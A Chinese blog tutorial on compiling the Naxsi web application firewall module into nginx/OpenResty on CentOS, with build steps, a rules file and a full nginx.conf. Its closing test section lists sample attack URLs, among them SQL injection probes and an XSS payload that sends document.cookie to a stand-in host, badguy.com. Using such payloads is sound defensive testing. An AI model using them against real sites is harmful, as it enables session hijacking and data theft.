CentOS Linux下用Nginx和Naxsi搭建Web应用防火墙

Naxsi是一个开源，高性能，低维护规则，nginx的Web应用程序防火墙模块，著名的Web服务器和反向代理。它的目标是帮助人们保护其Web应用程序，对跨站脚本，SQL注入，跨站请求伪造，本地和远程文件包含攻击。

二、下载Naxsi

cd /data0/software/
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master naxsi-master.zip
unzip naxsi-master.zip

三、重新编译nginx，加入naxsi模块

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src/
gmake
gmake install
cd ../

四、拷贝Naxsi的核心配置规则库

cp /data0/software/naxsi-master/naxsi_config/naxsi_core.rules /usr/local/webserver/nginx/conf/

定义一个虚拟主机的安全规则

vi /usr/local/webserver/nginx/conf/mysite.rules

内容如下：

#LearningMode; #Enables learning mode
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";
## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;

编辑nginx.conf

vi /usr/local/webserver/nginx/conf/nginx.conf

在http部分加入如下配置

include       /usr/local/webserver/nginx/conf/naxsi_core.rules;

完整的nginx.conf如下

user  www www;

worker_processes 8;

error_log  /data1/logs/nginx_error.log  crit;

pid        /usr/local/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events
{
  use epoll;
  worker_connections 65535;
}

http
{
  include       mime.types;
  include       /usr/local/webserver/nginx/conf/naxsi_core.rules;
  default_type  application/octet-stream;

  #charset  gb2312;
      
  server_names_hash_bucket_size 128;
  client_header_buffer_size 32k;
  large_client_header_buffers 4 32k;
  client_max_body_size 8m;
      
  sendfile on;
  tcp_nopush     on;

  keepalive_timeout 60;

  tcp_nodelay on;
  server_tokens off;

  fastcgi_connect_timeout 300;
  fastcgi_send_timeout 300;
  fastcgi_read_timeout 300;
  fastcgi_buffer_size 64k;
  fastcgi_buffers 4 64k;
  fastcgi_busy_buffers_size 128k;
  fastcgi_temp_file_write_size 128k;

  gzip on;
  gzip_min_length  1k;
  gzip_buffers     4 16k;
  gzip_http_version 1.0;
  gzip_comp_level 2;
  gzip_types       text/plain application/x-javascript text/css application/xml;
  gzip_vary on;

  #limit_zone  crawler  $binary_remote_addr  10m;
  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

  log_format  wwwlogs  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';
              

  server
  {
    listen       80;
    server_name  blog.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/blog;

    #limit_conn   crawler  20;    
                            
    location ~ .*\.(php|php5)?$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }
    
    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
      expires      30d;
    }

    location ~ .*\.(js|css)?$
    {
      expires      1h;
    }    

    access_log  /data1/logs/access.log  access;
  }

  server
  {
    listen       80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    location / {
        include    /usr/local/webserver/nginx/conf/mysite.rules;
        proxy_pass http://127.0.0.1/;
        proxy_set_header Host www.abc.com;    
    }

    location /RequestDenied {
        return 403;
    }
    access_log  /data1/logs/mysite.log  wwwlogs;
    error_log  /data1/logs/mysite_nginx_error.log debug;
  }

  server
  {
    listen       127.0.0.1:80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    location ~ .*\.(php|php5)?$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }

    access_log  /data1/logs/wwwlogs.log  wwwlogs;
  }

  server
  {
    listen  80;
    server_name  status.blog.abc.com;

    location / {
    stub_status on;
    access_log   off;
    }
  }
}

五、启动nginx

killall -9 nginx
/usr/local/webserver/nginx/sbin/nginx

六、测试

http://www.abc.com/test.php?name=40/**/and/**/1=1  不通过，含有条件注入
http://www.abc.com/test.php?name=%28%29            不通过，特殊字符
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E                                                   不通过，参数内容含脚本注入
http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过

可以到/data1/logs/mysite_nginx_error.log查看naxsi过滤的请求

除非注明，本博客文章均为原创，转载请以链接形式标明本文地址
本文地址： http://blog.cnwyhx.com/?p=301